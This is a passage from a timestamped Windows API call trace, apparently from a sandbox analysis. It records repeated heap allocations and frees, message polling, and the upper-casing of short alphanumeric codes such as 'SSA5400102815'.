dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.380] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0252.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0252.380] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.380] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0252.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0252.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0252.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0252.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0252.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0252.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.381] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0252.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0252.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0252.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0252.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0252.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0252.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.382] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0252.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0252.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0252.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0252.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.383] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0252.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0252.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0252.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0252.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0252.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0252.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.384] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0252.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0252.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0252.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0252.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0252.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0252.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0252.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0252.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0252.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.385] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0252.385] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0252.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7d8 [0252.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.386] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0252.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0252.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0252.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0252.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.386] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0252.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0252.387] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.387] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0252.387] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa310 [0252.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0252.387] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0252.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0252.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0252.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0252.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.388] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0252.388] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.388] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0252.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0252.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0252.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0252.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0252.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0252.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0252.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0252.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0252.390] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.390] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.390] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0252.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.390] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.391] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0252.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.391] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.391] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.392] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.392] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.392] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.392] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.392] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.392] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.392] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.392] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 